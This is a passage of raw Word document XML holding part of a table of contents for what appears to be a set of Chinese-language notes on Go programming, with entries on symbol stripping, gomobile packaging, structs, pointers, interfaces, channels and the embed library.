              <w:instrText xml:space="preserve"> PAGEREF _Toc159779759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>230</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="081A5F17" w14:textId="70FEC378" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779760" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>无符号信息打包：增加逆向难度</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>231</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76BEB45E" w14:textId="3F3A4C34" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779761" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Golang</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>打包成安卓</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apk</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>应用：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>gomobile</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>231</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D1A7123" w14:textId="2D5C5F96" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779762" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OOP</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：继承与派生</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>232</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A731046" w14:textId="3FD2BF05" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779763" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>struct{}{}</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：一个空类型的实例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>235</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B442EFD" w14:textId="0CC1B4C5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779764" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>[]struct {}{}</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>结构体数组又声明又初始化的方法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779764 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>236</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41CB666B" w14:textId="3DB79C8A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779765" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>初始化示例中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>写法</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Eg: a:=&amp;xx{xx,xx}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779765 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>237</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3324EDCA" w14:textId="3183695E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779766" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>go</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的指针简单理解</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779766 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>238</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AC32CD6" w14:textId="28B70864" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779767" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>判断某类型或者某成员变量是否为空：不该直接</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>!=nil</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>判断</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779767 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>239</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C9BC80A" w14:textId="63E25DF6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779768" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>golang</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多任务处理</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-chan</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>信号量确认任务处理完毕</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779768 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>240</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F55E740" w14:textId="62CFCE18" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779769" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Golang</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>interface</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：泛型、接口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779769 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>242</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D953DE5" w14:textId="3E3BF413" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779770" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何在</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>range</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>循环中修改数组</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>切片内容</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779770 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>245</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21744426" w14:textId="0F2B1C9E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779771" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>涉及不太好处理的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>interface</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>map</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类型或者列表类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779771 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>247</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04672400" w14:textId="31B58669" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779772" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>embed</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>库：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">go:embed </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>嵌入文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779772 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>247</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03DCBE57" w14:textId="50D572D8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779773" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>包中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>init</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>函数：先于</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>函数执行，实现包的一些初始化操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779773 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>248</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="467EB4C5" w14:textId="01A7B07C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
